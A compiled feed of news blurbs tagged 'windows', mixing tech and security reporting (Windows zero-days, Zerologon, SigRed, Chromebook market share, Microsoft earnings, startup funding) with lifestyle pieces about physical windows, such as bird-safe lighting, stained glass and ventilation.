Turn the Lights Out. Here Come the Birds.

Buildings, landmarks and monuments are turning off lights to prevent fatal impacts as birds set off on spring migration.

#academy-of-natural-sciences, #animal-behavior, #animal-migration, #audubon-society-national, #birds, #canada, #conservation-of-resources, #cornell-lab-of-ornithology, #dallas-tex, #florida, #fort-worth-tex, #lighting, #new-york-city, #windows


“Expert” hackers used 11 zerodays to infect Windows, iOS, and Android users

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Enlarge (credit: Getty Images)

A team of advanced hackers exploited no fewer than 11 zeroday vulnerabilities in a nine-month campaign that used compromised websites to infect fully patched devices running Windows, iOS, and Android, a Google researcher said.

Using novel exploitation and obfuscation techniques, a mastery of a wide range of vulnerability types, and a complex delivery infrastructure, the group exploited four zerodays in February 2020. The hackers’ ability to chain together multiple exploits that compromised fully patched Windows and Android devices led members of Google’s Project Zero and Threat Analysis Group to call the group “highly sophisticated.”

Not over yet

On Thursday, Project Zero researcher Maddie Stone said that, in the eight months that followed the February attacks, the same group exploited seven more previously unknown vulnerabilities, which this time also resided in iOS. As was the case in February, the hackers delivered the exploits through watering-hole attacks, which compromise websites frequented by targets of interest and add code that installs malware on visitors’ devices.

Read 8 remaining paragraphs | Comments

#android, #biz-it, #chrome, #exploits, #google, #ios, #vulnerabilities, #windows, #zerodays


Bitflips when PCs try to reach windows.com: What could possibly go wrong?

Stock photo of ones and zeros displayed across a computer screen.

Enlarge (credit: Getty Images)

Bit flips are events that cause individual bits stored in an electronic device to flip, turning a 0 to a 1 or vice versa. Cosmic radiation and fluctuations in power or temperature are the most common naturally occurring causes. Research from 2010 estimated that a computer with 4GB of commodity RAM has a 96 percent chance of experiencing a bit flip within three days.

An independent researcher recently demonstrated how bitflips can come back to bite Windows users when their PCs reach out to Microsoft’s windows.com domain. Windows devices do this regularly to do things like making sure the time shown in the computer clock is accurate, connecting to Microsoft’s cloud-based services, and recovering from crashes.

Remy, as the researcher asked to be referred to, mapped the 32 valid domain names that were one bitflip away from windows.com. He provided the following to help readers understand how these flips can cause the domain to change to whndows.com:

Read 12 remaining paragraphs | Comments

#bitflips, #bits, #biz-it, #domains, #microsoft, #operating-systems, #tech, #windows


Chromebooks had a banner 2020

2020 was a weird year by any measure. Certainly it was a wild ride for those in the consumer electronics category. Take smartphones — first there were manufacturing delays out of China, followed by an across the board decrease in demand. There are lots of reasons contributing to the latter, but the simplest and most prevalent one is that people just didn’t want to spend money to upgrade their devices.

But the pandemic also changed how — and where — many people work and learn. It was an abrupt shift for many that required tech investments, even in the face of economic uncertainty. After years of stagnating, plateauing and dropping, PC and tablet sales saw a spike. Earlier this month, IDC noted a nearly 20% increase in tablet sales for Q4, owing in part to a backlog in PC availability.

New figures from the firm (first noted by GeekWire) point to some significant gains for Chromebooks during that time period. According to IDC’s PC Tracker, the models comprised 10.8% of the PC market for 2020; that’s up from 6.4% a year prior. The number also pushed past MacOS’s 7.5% for the year.

Even so, Apple still grew as an overall percent of the market, up from 6.7%. Both of those numbers have eaten into Windows’ figures — though Microsoft continues to dominate the market at 80.5% (down from 85.4%).

The figures reflect positive reports from other firms. In January, Canalys noted, “Chromebook vendors enjoyed new heights of success in Q4, as the overall market almost quadrupled in size over the same period a year ago.” Pricing is certainly a factor, along with an overall scramble as schools have gone virtual amid COVID-19 concerns.

#chrome, #chrome-os, #chromebooks, #hardware, #idc, #macos, #windows


The world’s second-most popular desktop operating system isn’t macOS anymore

Market share chart

Enlarge (credit: Ars Technica)

For ages now, every annual report on desktop operating system market share has had the same top two contenders: Microsoft’s Windows in a commanding lead at number one and Apple’s macOS in distant second place. But in 2020, Chrome OS became the second-most popular OS, and Apple fell to third.

That’s according to numbers from market data firm IDC and a report on IDC’s data by publication GeekWire. Chrome OS had passed macOS briefly in individual quarters before, but 2020 was the first full year when Apple’s OS took third place.

Despite the fact that macOS landed in third, viewing this as an example of Google beating out Apple directly might not be accurate. Rather, it’s likely that Chrome OS has been primarily pulling sales and market share away from Windows at the low end of the market. Mac market share actually grew from 6.7 percent in 2019 to 7.5 percent in 2020.

Read 4 remaining paragraphs | Comments

#chromebook, #chromeos, #mac, #macos, #pc, #tech, #windows


Zero-days under active exploit are keeping Windows users busy

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Enlarge (credit: Getty Images)

It’s the second Tuesday of February, and that means Microsoft and other software makers are releasing dozens of updates to fix security vulnerabilities. Topping off this month’s list are two zero-days under active exploit and critical networking flaws that allow attackers to remotely execute malicious code or shut down computers.

The most important patch fixes a code-execution flaw in Adobe Reader, which despite its long-in-the-tooth status remains widely used for viewing and working with PDF documents. CVE-2021-21017, as the critical vulnerability is tracked, stems from a heap-based buffer overflow. After being tipped off by an anonymous source, Adobe warned that the flaw has been actively exploited in limited attacks that target Reader users running Windows.

Adobe didn’t provide additional details about the vulnerability or the in-the-wild attacks exploiting it. Typically, hackers use specially crafted documents sent by email or published online to trigger the vulnerability and execute code that installs malware on the device running the application. Adobe’s use of the word “limited” likely means that the hackers are narrowly focusing their attacks on a small number of high-value targets.

Read 9 remaining paragraphs | Comments

#adobe, #biz-it, #exploits, #microsoft, #reader, #tech, #vulnerabilities, #windows, #zerodays


Apple launches an iCloud Passwords extension for Chrome users on Windows

Apple has introduced an iCloud Passwords Chrome extension that will make life easier for those who use both Windows computers and other Apple devices, like a Macbook or an iPhone. The new browser extension lets you access the passwords you saved in Safari on your other Apple devices, then use them within Chrome when you’re on a Windows PC.

You can also save any new passwords you create in Chrome to your iCloud keychain, so it’s synced across your Apple devices.

Image Credits: Apple

Apple didn’t formally announce the new feature, but reports of an iCloud Passwords extension had already been referenced in the release notes of the new iCloud for Windows 10 (ver 12), which arrived at the end of January. After the update, a “Passwords” section appeared in the app designated by the iCloud Keychain logo. This directed users to download the new extension, but the link was broken, as the extension was not yet live.

That changed on Sunday, according a report from 9to5Google, which found the new Chrome add-on had been published to the Chrome Web Store late on Sunday evening. Now, when Windows users access the new Passwords section, the dialog box that prompts the download will properly function.

Once installed, Chrome users on Windows will be able to access any passwords they saved or allowed iCloud Keychain to securely generate for them within Safari for macOS or iOS. Meanwhile, as Windows users create new credentials, these, too, will be synced to their iCloud Keychain so they can later be pulled up on Mac, iPhone, and iPad devices, when needed.

This is the first Chrome extension to support iCloud Keychain on Windows, as before Apple had only offered an iCloud Bookmarks tool for older Windows 7 and 8 PCs, which reached over 7 million users.

Image Credits: Apple

Some users who have tried the extension are reporting problems, but it seems that’s related to their PCs not having been first updated to iCloud for Windows 12.0, which is a prerequisite for the new extension to work.

Though Apple typically locks users into its own platforms, it has slowly expanded some of its services to Windows and even Android, where it makes sense. Today, Apple offers its entertainment apps like Apple Music and Apple TV on other platforms, including Android, and has launched Apple TV on its media player rival, Amazon Fire TV, among others. And 9to5Mac notes that Apple appears to be working to bring Music and Podcasts to the Microsoft Store in the future, as well.

#apple, #browser, #chrome, #icloud, #icloud-keychain, #microsoft, #passwords, #safari, #security, #windows


Can Cute Windows Resurrect a Depressed Town in Upstate New York?

A project in Cherry Valley, a longtime artists’ haven, is brightening storefronts and telling the world, “We’re still here!”

#art, #bley-paul, #historic-buildings-and-sites, #windows


Microsoft earnings: Xbox hardware sales shot up 86% with Series X/S

The Xbox Series X, which launched in November.

Enlarge / The Xbox Series X, which launched in November. (credit: Sam Machkovech)

Microsoft delivered its earnings report for Q2 2021 yesterday, and the company has continued its sprint of very strong quarters, again driven primarily by Azure and the cloud. But that same old story isn’t the only one here: the report also tells us a thing or two about the new Xbox’s performance, as well as Windows and Office.

Overall, Microsoft beat analyst expectations. The company’s top-level revenue grew 17 percent year over year, reaching $43.08 billion. Analysts had expected $40.18 billion. $14.6 billion of that was from the business segment Microsoft calls “Intelligent Cloud,” which most notably includes Azure but also some other professional services like GitHub.

Cloud wasn’t the only positive story, though. Personal Computing including Windows, Xbox, and Surface grew 15 percent compared to the previous year to just over $15 billion. That included an 86 percent increase in Xbox hardware sales, as well as a 40 percent increase in Xbox content and surfaces—the former of those includes the launch of the Xbox Series X/S consoles in November, and the latter includes Game Pass, which Microsoft has been pushing hard as a core value proposition for the Xbox game platform.

Read 5 remaining paragraphs | Comments

#earnings, #microsoft, #microsoft-azure, #office, #satya-nadella, #tech, #windows, #xbox


How to (Literally) Drive the Coronavirus Away

What’s the transmission risk inside a car? An airflow study offers some insight for passengers and drivers alike.

#automobiles, #car-services-and-livery-cabs, #coronavirus-risks-and-safety-concerns, #taxicabs-and-taxicab-drivers, #windows, #your-feed-health, #your-feed-science


Hackers used 4 zero-days to infect Windows and Android devices

Stylized image of rows of padlocks.

Enlarge (credit: Getty Images)

Google researchers have detailed a sophisticated hacking operation that exploited vulnerabilities in Chrome and Windows to install malware on Android and Windows devices.

Some of the exploits were zero-days, meaning they targeted vulnerabilities that at the time were unknown to Google, Microsoft, and most outside researchers (both companies have since patched the security flaws). The hackers delivered the exploits through watering-hole attacks, which compromise sites frequented by the targets of interest and lace the sites with code that installs malware on visitors’ devices. The boobytrapped sites made use of two exploit servers, one for Windows users and the other for users of Android.

Not your average hackers

The use of zero-days and complex infrastructure isn’t in itself a sign of sophistication, but it does show above-average skill by a professional team of hackers. Combined with the robustness of the attack code—which chained together multiple exploits in an efficient manner—the campaign demonstrates it was carried out by a “highly sophisticated actor.”

Read 7 remaining paragraphs | Comments

#android, #biz-it, #exploits, #google-project-zero, #tech, #vulnerabilities, #windows, #zerodays


Microsoft hints at coming “sweeping visual rejuvenation” of Windows 10

This screenshot of the Photos and Calculator apps comes from a video Microsoft product chief Panos Panay dropped on Instagram to demonstrate new UI concepts in March 2020.

Enlarge / This screenshot of the Photos and Calculator apps comes from a video Microsoft product chief Panos Panay dropped on Instagram to demonstrate new UI concepts in March 2020. (credit: Microsoft)

We’ve been hearing rumors for a while now about a significant visual refresh planned for Windows 10 in 2021 under the codename “Sun Valley.” Those rumors gained some extra steam this morning, when Windows Latest reporter Mayank Parmar spotted a Microsoft job posting made in October that offered prospective senior software engineer hires an opportunity to “deliver a sweeping visual rejuvenation of Windows experiences to signal [that] Windows is BACK.”

Shortly after Parmar published a report on the listing, Microsoft edited it to remove the interesting bits—it now reads like a standard software engineer job listing, offering the opportunity to “build delightful, polished experiences for Windows” without saying anything about changes coming to Windows.

What we know about Sun Valley so far

Sun Valley is rumored to be a major UI code overhaul expected to land in Windows 10 21H2—the build that will drop in the second half of 2021. To be clear, the “rumored” part means exactly what it says—so far, it’s rumors only, with multiple sources but no confirmation from Microsoft.

Read 4 remaining paragraphs | Comments

#microsoft, #sun-valley, #tech, #uncategorized, #windows, #windows-10


Microsoft may be developing its own, in-house ARM CPU designs

Microsoft has so far neither confirmed nor denied Bloomberg's claims regarding in-house CPU designs.

Enlarge / Microsoft has so far neither confirmed nor denied Bloomberg’s claims regarding in-house CPU designs. (credit: Aurich Lawson / Grid Engine)

This afternoon, Bloomberg reported that Microsoft is in the process of developing its own ARM CPU designs, following in the footsteps of Apple’s M1 mobile CPU and Amazon’s Graviton datacenter CPU.

Bloomberg cites off-record conversations with Microsoft employees who didn’t want to be named. These sources said that Microsoft is currently developing an ARM processor for datacenter use and exploring the possibility of another for its Surface line of mobile PCs.

Bloomberg’s sources paint the datacenter part as “more likely” and a Surface part as “possible.” This seems plausible, given that Microsoft’s chip design unit reports to the Azure cloud VP, with no direct reporting ties to the Surface division. Microsoft declined to comment on any specific plans, saying only that it “[continues] to invest in our own capabilities in areas like design, manufacturing and tools, while also fostering and strengthening partnerships with a wide range of chip providers.”

Read 4 remaining paragraphs | Comments

#amazon, #apple, #arm, #cpus, #datacenter-cpus, #microsoft, #microsoft-surface, #mobile-cpus, #surface, #tech, #windows, #windows-arm


Xbox cloud gaming service hits iOS, Windows PCs in spring 2021

This demonstration of Microsoft's Project xCloud as played with a Razer Kishi controller, attached to a standard Android smartphone, could be a hint of what's to come to iOS devices in spring of 2021.

Enlarge / This demonstration of Microsoft’s Project xCloud as played with a Razer Kishi controller, attached to a standard Android smartphone, could be a hint of what’s to come to iOS devices in spring of 2021. (credit: Microsoft)

In a blog post today outlining everything from upcoming games to plans for Xbox Series X/S, Microsoft announced that Xbox cloud gaming will come to iOS mobile devices and Windows PCs in spring of 2021.

On Windows PCs, the games will stream through the Xbox app or a Web browser, whereas the service will be limited to the mobile Web browser on iOS devices.

Microsoft’s game-streaming features require an Xbox Game Pass Ultimate subscription, which also includes an on-demand library of downloadable games for both Xbox platforms and Windows PCs, the EA Play downloadable game library, and Xbox Live Gold, Microsoft’s online multiplayer service.

Read 7 remaining paragraphs | Comments

#app-store, #apple, #apple-app-store, #gaming-culture, #ios, #microsoft, #pc, #project-xcloud, #safari, #tech, #windows, #xbox, #xbox-cloud-gaming


The Munich Atelier Where Stained Glass Comes to Life

In a six-story building in the city’s center, Michael and Petra Mayer run — and reside in — one of the world’s oldest and most celebrated architectural glass and mosaic studios.

#architecture, #art, #churches-buildings, #glass, #historic-buildings-and-sites, #interior-design-and-furnishings, #munich-germany, #restoration-and-renovation, #stained-glass, #windows


See the New York City Holiday Christmas Windows

Department stores are in trouble. Tourism is a mess. But behind the glass vitrines, the show goes on.

#bergdorf-goodman, #bloomingdales, #macys-inc, #quarantine-life-and-culture, #saks-fifth-avenue, #shopping-and-retail, #windows, #your-feed-fashion


Google’s Project Zero discloses Windows 0day that’s been under active exploit

A stylized skull and crossbones made out of ones and zeroes.

Enlarge (credit: Getty Images)

Google’s project zero says that hackers have been actively exploiting a Windows zeroday that isn’t likely to be patched until almost two weeks from now.

In keeping with long-standing policy, Google’s vulnerability research group gave Microsoft a seven-day deadline to fix the security flaw because it’s under active exploit. Normally, Project Zero discloses vulnerabilities after 90 days or when a patch becomes available, whichever comes first.

CVE-2020-117087, as the vulnerability is tracked, allows attackers to escalate system privileges. Attackers were combining an exploit for it with a separate one targeting a recently fixed flaw in Chrome. The former allowed the latter to escape a security sandbox so the latter could execute code on vulnerable machines.

Read 9 remaining paragraphs | Comments

#biz-it, #exploits, #google, #microsoft, #project-zero, #vulnerabilities, #windows


Pulumi raises $37.5M Series B for its cloud engineering platform

Seattle-based Pulumi, one of the newer startups in the ”infrastructure-as-code” space, today announced that it has raised a $37.5 million Series B funding round led by NEA. Previous investors Madrona Venture Group and Tola Capital also participated in this round, which brings the total investment in the company to $57.5 million.

The new investment follows the launch of Pulumi 2.0, which got the company closer to its vision of becoming what the team calls a ‘cloud engineering platform’ and impressive growth over the last, with a 10x growth in adoption in the last twelve months.

“We started with infrastructure as code, because we felt like that was a foundational piece that gave us the programming model, along with the cloud resource model,” Pulumi co-founder and CEO Joe Duffy told me. “That was an important place to start. With [Pulumi] 2.0,  we launched support for testing, for policy as code — so that you could actually apply governance and compliance as part of your infrastructure management — and really helping more of the team work together.”

Indeed, after starting with a focus on infrastructure teams, Pulumi is now looking to expand across teams.

“The infrastructure team is becoming the nucleus that pulls the whole team together. We’re actually calling this cloud engineering,” Duffy explained. “What we’re calling cloud engineering is developers using the cloud in a first-class way, infrastructure teams helping them do that and increasingly pulling in security engineers to make sure that governance is part of the story as well. The 2.0 release was our first time exploring those adjacencies and trying to paint a path to realizing the full Pulumi vision.”

Infrastructure as code isn’t necessarily new, of course. The promise of Pulumi is that it isn’t hobbled by any legacy products but that the team designed it as a cloud-native product from the ground up. That’s something NEA’s Aaron Jacobson, who will join the company’s board, also stressed.

“If you think about how fast the cloud has evolved just in 10 years, Pulumi is built in a place of multi-cloud, of Kubernetes, of serverless, Jacobson said. “And much of the original infrastructure-as-code constructs didn’t even have those in mind. Since Pulumi is newer to market and has come after all those constructs, it just has better integration, it’s just is a more delightful experience to developers.”

NEA’s Scott Sandell is actually taking this a bit further. “Venture capitalists are in the business of pattern recognition,” he said. “And the pattern that I recognized actually goes all the way back to when I was a product manager in the windows group. And I saw that developers don’t want to have to deal with complexity — they want to have the complexity managed for them.” That, he argues, is what Pulumi does for developers — and it surely helped the both Duffy and his co-founder and Pulumi executive chairman Eric Rudder left successful careers at Microsoft to build this company.

In addition to the new funding, Pulumi also today announced that it brought in a number of new executives, including industry veterans Jay Wampold as CMO, Lindsay Marolich as senior director of demand generation, Kevin Kotecki as VP of sales and Lee-Ming Zen as VP of engineering.

#aaron-jacobson, #cloud, #cloud-computing, #cloud-infrastructure, #co-founder, #developer, #madrona-venture-group, #microsoft, #nea, #pulumi, #recent-funding, #scott-sandell, #seattle, #startups, #tola-capital, #vp-of-sales, #windows


We’re Living in a World of Walls. Here Is a Window to Escape.

On ancient stones and new barriers, computer screens and emergency exits.

#border-barriers, #cairo-egypt, #deaths-fatalities, #israel, #quarantine-life-and-culture, #sarajevo-bosnia-and-herzegovina, #windows


FBI/DHS: Government election systems face threat from active Zerologon exploits

FBI/DHS: Government election systems face threat from active Zerologon exploits

Enlarge (credit: Getty Images)

The FBI and the cybersecurity arm of the Department of Homeland Security said they have detected hackers exploiting a critical Windows vulnerability against state and local governments and that in some cases the attacks are being used to breach networks used to support elections.

Members of unspecific APTs—the abbreviation for advanced persistent threats—are exploiting the Windows vulnerability dubbed Zerologon. It gives attackers who already have a toehold on a vulnerable network access to the all-powerful domain controllers that administrators use to allocate new accounts and manage existing ones.

To gain initial access, the attackers are exploiting separate vulnerabilities in firewalls, VPNs, and other products from companies including Juniper, Pulse Secure, Citrix NetScaler, and Palo Alto Networks. All of the vulnerabilities—Zerologon included—have received patches, but as evidenced by Friday’s warning from the DHS and FBI, not everyone has installed them. The inaction is putting governments and elections systems at all levels at risk.

Read 3 remaining paragraphs | Comments

#biz-it, #department-of-homeland-security, #dhs, #fbi, #federal-bureau-of-investigation, #microsoft, #policy, #tech, #windows, #zerologon


Windows 10 machines running on ARM will be able to emulate x64 apps soon

Windows laptops and convertibles running ARM aren’t exactly the bulk of the market at this point, but there are several of them there—including Microsoft’s own updated Surface Pro X, which was just announced today.

One of the reasons that not every consumer has made the plunge is that running traditional x86 apps on these Windows 10 ARM machines poses significant limitations. Among the biggest: there’s no support at all for running 64-bit x86 applications in emulation, only 32-bit.

Today, Microsoft announced in a long-winded blog post that that limitation will soon change, as emulation of 64-bit Windows applications is going into a public-testing phase soon. That addresses one of the biggest complaints about the platform—complaints that have only grown as more popular applications have converted to 64-bit-only as the months have gone by.

Read 5 remaining paragraphs | Comments

#arm, #cpu, #emulation, #microsoft, #tech, #virtualization, #windows, #x86


Following Apple’s Sidecar launch, Astropad announces Luna Display for Windows

In June, Luna Display creator Astropad wrote a blog post titled, “Why Getting Sherlocked by Apple Was a Blessing in Disguise.” It arrived on the one-year anniversary of Apple’s launch of Sidecar for macOS, which let Mac owners use an iPad as a second display — thus making Luna’s functionality redundant.

The rose-colored post detailed how the company planned to pivot by diversifying its portfolio — in the case of Luna, that specifically meant launching a Windows version. “Later this summer, we’ll open up Astropad Studio for a free public beta on Windows,” the company wrote. “Not long after, we’ll be launching a Kickstarter campaign for an HDMI version of Luna Display.”

Today the company launched a Kickstarter for its Windows version, two years after launching the original Mac dongle on the crowdfunding platform. Delivery is set for May 2021. Early-bird supporters can get on-board with the device for as low as $49 (down from a retail price of $80).

Image Credits: Astropad

The dongle turns an iPad into a second display for a Windows PC, either wirelessly or tethered. The model comes in either USB-C of HDMI models, depending on the ports available on your machine. The second tablet can be used as a touchscreen for the extended monitor, which should work well with Windows 10, given how much Microsoft has tailored it to a touch experience.

I was a fan of the original Luna for Mac — though, like many, had less interest in the product as soon as Apple announced native support for Sidecar. Following the launch of Windows support, owners of the original Mac version will be able to use their existing device with PCs, as well. The device will work for Mac to iPad, Windows to iPad, Mac to Mac (with one laptop serving as a second screen) and a “headless mode,” with uses the iPad as a display for the Mac Mini and Mac Pro.

#apple, #astropad, #hardware, #ipad, #luna-display, #microsoft, #sidecar, #windows


How to Keep the Coronavirus at Bay Indoors

Tips for dodging the virus as Americans retreat from colder weather: Open the windows, buy an air filter — and forget the UV lights.

#content-type-service, #coronavirus-2019-ncov, #coronavirus-risks-and-safety-concerns, #education-k-12, #fans-airflow, #filters, #hygiene-and-cleanliness, #masks, #ultraviolet-light, #windows, #your-feed-science


Microsoft brings new robotic process automation features to its Power Platform

Earlier this year, Microsoft acquired Softomotive, a player in the low-code robotic process automation space with a focus on Windows. Today, at its Ignite conference, the company is launching Power Automate Desktop, a new application based on Softomotive’s technology that lets anyone automate desktop workflows without needing to program.

“The big idea of Power Platform is that we want to go make it so development is accessible to everybody,” Charles Lamanna, Microsoft’s corporate VP for its low-code platform, told me. “And development includes understanding and reporting on your data with Power BI, building web and mobile applications with Power Apps, automating your tasks — whether it’s through robotic process automation or workflow automation — with Power Automate, or building chatbots and chat-based experiences with Power Virtual Agent.”

Power Automate already allowed users to connect web-based applications, similar to Zapier and IFTTT, but the company also launched a browser extension earlier late last year to help users connect native system components to Power Automate. Now, with the integration of the Softomotive technology and the launch of this new low-code Windows application, it’s taking this integration into the native Windows user interface one step further.

“Everything still runs in the cloud and still connects to the cloud, but you now have a rich desktop application to author and record your UI automations,” Lamanna explained. He likened it to an ‘ultimate connector,’ noting that the “ultimate API is just the UI.”

He also stressed that the new app feels like any other modern Office app like Outlook (which is getting a new Mac version today, by the way) or Word. And like the modern versions of those apps, Power Automate Desktop derives a lot of its power from being connected to the cloud.

It’s also worth noting that Power Automate isn’t just a platform for automating simple two- or three-step processes (like sending you a text message when your boss emails you), but also for multistep, business-critical workflows. T-Mobile, for example, is using the platform to automate some of the integration processes between its systems and Sprint.

Lamanna noted that for some large enterprises, adopting these kinds of low-code services necessitates a bit of a culture shift. IT still needs to have some insights into how these tools are used, after all, to ensure that data is kept safe, for example.

Another new feature the company announced today is an integration between the Power Platform and GitHub, which is now in public preview. The idea here is to give developers the ability to create their own software lifecycle workflows. “One of the core ideas of Power Platform is that it’s low code,” Lamanna said. “So it’s built first for business users, business analysts, not the classical developers. But pro devs are welcome. The saying I have is: we’re throwing a party for business users, but pro devs are also invited to the party.” But to get them onto the platform, the team wants to meet them where they are and let them use the tools they already use — and that’s GitHub (and Visual Studio and Visual Studio Code).

#articles, #author, #automation, #business, #business-process-automation, #business-process-management, #business-software, #economy, #ifttt, #microsoft, #microsoft-windows, #player, #softomotive, #tc, #windows, #zapier


JAWS architect Glen Gordon is joining Sight Tech Global, a virtual event Dec. 2-3

For people who are blind or visually impaired, JAWS is synonymous with freedom to operate Windows PCs with a remarkable degree of control and precision with output in speech and Braille. The keyboard-driven application makes it possible to navigate GUI-based interfaces of web sites and Windows programs. Anyone who has ever listened to someone proficient in JAWS (the acronym for “Job Access With Speech”) navigate a PC can’t help but marvel at the speed of the operator and the rapid fire machine-voice responses from JAWS itself.

For nearly 25 years, JAWS has dominated the field of screen readers, and is in use by hundreds of thousands of people worldwide. It is inarguably one of the greatest achievements in modern assistive technology. We are delighted to announce that Glen Gordon, the architect of JAWS for over 25 years, is joining the agenda at Sight Tech Global, which is a virtual event (Dec. 2-3) focused on how AI-related technologies will influence assistive technology and accessibility in the years ahead. Attendance is free and registration is open.

Blind since birth, Gordon’s interest in accessibility developed out of what he calls “a selfish desire to use Windows at a time when it was not at all clear that graphical  user interfaces could be made accessible.”  He has an MBA from the UCLA Anderson School, and he learned software development through “the school of hard knocks and lots of frustration trying to use inaccessible software.” He is an audio and broadcasting buff and host of FSCast, the podcast from Freedom Scientific.

The latest public beta release of JAWS contains a glimpse of the future for the storied software: It now works with certain user voice commands – “Voice Assist” – and provides more streamlined access to image descriptions, both thanks to AI technologies that the JAWS team at Freedom Scientific is using  in JAWS as well as FUSION (which combines JAWS and ZoomText, a screen magnifier). Those updates address two of JAWS’ challenges – the complexity of the available keyboard command set that intimidates some users and “alt tags” on images that don’t always adequately describe the image.

“The upcoming versions of JAWS, ZoomText,  and Fusion use natural language processing to allow many screen reader commands to be performed verbally,” says Gordon. “ You probably wouldn’t want to speak every command, but for the less common ones Voice assist offers a way to minimize the key combinations that you need to learn.”

“Broadly speaking, we’re looking to make it easier for  people to  use a smaller command set to work efficiently. This fundamentally means making our products smarter, and being able to anticipate what a user wants and needs based on their prior actions. Getting there is an imprecise process and we’ll continue to rely on user feedback to help guide us towards what works best.”

The next generation of screen readers will take advantage of AI among other technologies, and that will be a major topic at Sight Tech Global on Dec. 2-3. Get your free pass now.

Sight Tech Global Sight Tech Global welcomes sponsors. Current sponsors include Verizon Media, Google, Waymo, Mojo Vision and Wells Fargo, The event is organized by volunteers and all proceeds from the event benefit The Vista Center for the Blind and Visually Impaired in Silicon Valley.

Pictured above: JAWS Architect Glen Gordon in his home audio studio. 

#artificial-intelligence, #augmented-reality, #developer, #gadgets, #hack, #sight-tech-global, #tc, #ucla, #web-accessibility, #windows


New Windows exploit lets you instantly become admin. Have you patched?

A casually dressed man smiles next to exposed computer components.

Enlarge (credit: VGrigas (WMF))

Researchers have developed and published a proof-of-concept exploit for a recently patched Windows vulnerability that can allow access to an organization’s crown jewels—the Active Directory domain controllers that act as an all-powerful gatekeeper for all machines connected to a network.

CVE-2020-1472, as the vulnerability is tracked, carries a critical severity rating from Microsoft as well as a maximum of 10 under the Common Vulnerability Scoring System. Exploits require that an attacker already have a foothold inside a targeted network, either as an unprivileged insider or through the compromise of a connected device.

An “insane” bug with “huge impact”

Such post-compromise exploits have become increasingly valuable to attackers pushing ransomware or espionage spyware. Tricking employees to click on malicious links and attachments in email is relatively easy. Using those compromised computers to pivot to more valuable resources can be much harder.

Read 13 remaining paragraphs | Comments

#active-directory, #biz-it, #domain-controller, #exploits, #patches, #tech, #vulnerabilities, #windows


Can You Hear Yourself Think?

Working from home often means having to cope with street noise and the clamor of children and pets. Here are some tips on how to quiet things down.

#acoustics, #content-type-service, #home-repairs-and-improvements, #interior-design-and-furnishings, #noise, #quarantine-life-and-culture, #real-estate-and-housing-residential, #telecommuting, #windows


Your Hot-Weather Guide to Coronavirus, Air-Conditioning and Airflow

Indoor air is riskier than outdoor air. So what do you do if it’s really hot out?

#air-conditioning, #coronavirus-2019-ncov, #coronavirus-risks-and-safety-concerns, #engineering-and-engineers, #windows, #world-health-organization


Microsoft urges patching severe-impact, wormable server vulnerability

A data center stock photo. I spy with my little eye some de-badged EMC Symmetrix DMX-3 or DMX-4 disk bays at right and some de-badged EMC CX disk bays at left. Disk arrays like these are a mainstay of traditional enterprise data center SANs.

Enlarge / A data center stock photo. I spy with my little eye some de-badged EMC Symmetrix DMX-3 or DMX-4 disk bays at right and some de-badged EMC CX disk bays at left. Disk arrays like these are a mainstay of traditional enterprise data center SANs. (credit: Bryce Duffy / Getty Images)

Microsoft is urgently advising Windows server customers to patch a vulnerability that allows attackers to take control of entire networks with no user interaction and, from there, rapidly spread from computer to computer.

The vulnerability, dubbed SigRed by the researchers who discovered it, resides in Windows DNS, a component that automatically responds to requests to translate a domain into the IP address computers need to locate it on the Internet. By sending maliciously formed queries, attackers can execute code that gains domain administrator rights and, from there, take control of an entire network. The vulnerability, which doesn’t apply to client versions of Windows, is present in server versions from 2003 to 2019. SigRed is formally tracked as CVE-2020-1350. Microsoft issued a fix as part of this month’s Update Tuesday.

Both Microsoft and the researchers from Check Point, the security firm that discovered the vulnerability, said that it’s wormable, meaning it can spread from computer to computer in a way that’s akin to falling dominoes. With no user interaction required, computer worms have the potential to propagate rapidly just by virtue of being connected and without requiring end users to do anything at all.

Read 7 remaining paragraphs | Comments

#biz-it, #computer-worms, #microsoft, #patches, #tech, #vulnerabilities, #windows


Scientists Say You Can Cancel the Noise but Keep Your Window Open

Researchers in Singapore developed a system that’s sort of like noise-canceling headphones for your whole apartment.

#noise, #research, #scientific-reports-journal, #speakers-audio, #urban-areas, #windows, #your-feed-science


Unscheduled fixes for critical Windows flaws delivered through rare channel

Stylized illustration of a padlock.

Enlarge (credit: Microsoft)

Microsoft has published unscheduled fixes for two critical vulnerabilities that make it possible for attackers to execute malicious code on computers running any version of Windows 10.

Unlike the vast majority of Windows patches, the ones released on Tuesday were delivered through the Microsoft Store. The normal channel for operating System security fixes is Windows Update. Advisories here and here said users need not take any action to automatically receive and install the fixes.

“Affected customers will be automatically updated by Microsoft Store. Customers do not need to take any action to receive the update,” both advisories said. “Alternatively, customers who want to receive the update immediately can check for updates with the Microsoft Store App; more information on this process can be found here.”

Read 3 remaining paragraphs | Comments

#biz-it, #exploits, #microsoft, #patches, #tech, #vulnerabilities, #windows


The iRig Pro Duo I/O makes managing advanced audio workflows simple anywhere

Connecting audio interfaces to the various mobile and computing devices we use these days can be a confusing headache. The iRig Pro Duo I/O ($199.99 USD), which IK Multimedia announced this year at CES and recently released, is a great way to simplify those connections while giving you all the flexibility you need to record high-quality audio anywhere, with any device.

The basics

The iRig Pro Duo is a new addition to IK’s lineup based on the original iRig Pro, which adds a second XLR input, as the name implies. It’s still quite small and portable, fitting roughly in your hand, with built-in power optionally supplied via two AA batteries, while you can also power it via USB connection, or with an optional dedicated plug-in power adapter accessory.

Compared to desktop devices like the Scarlett Focusrite 2i2 USB audio interface that’s a popular standard among home audio enthusiasts, the iRig Pro Duo is downright tiny. It’s still beefier than the iRig Pro, of course, but it’s a perfect addition to a mobile podcaster’s kit for ultimate portability while also maintaining all the features and capabilities you need.

The iRig Pro Duo also includes balanced L/R 1/4″ output, built-in 48v phantom power for passive Macs, a 3.5 mm stereo jack for direct monitoring, 2x MIDI inputs and dedicated gain control with simple LED indicators for 48V power status and to indicate audio input peaking.


Beveled edges and a slightly rounded rectangular box design might not win the iRig Pro Duo any accolades from the haute design community, but it’s a very practical form factor for this type of device. Inputs go in one side, and output comes out the other. IK Multimedia employs a unique connector for its output cables, but provides every one you could need in the box for connecting to Mac, iOS, Windows and Android devices.

The whole thing is wrapped in a matte, slightly rubberized outside surface that feels grippy and durable, while also looking good in an understated way that suits its purpose as a facilitation device. The knobs are large and easy to turn with fine-grained control, and there are pads on the underside of the Duo to help it stick a bit better to a surface like a table or countertop.

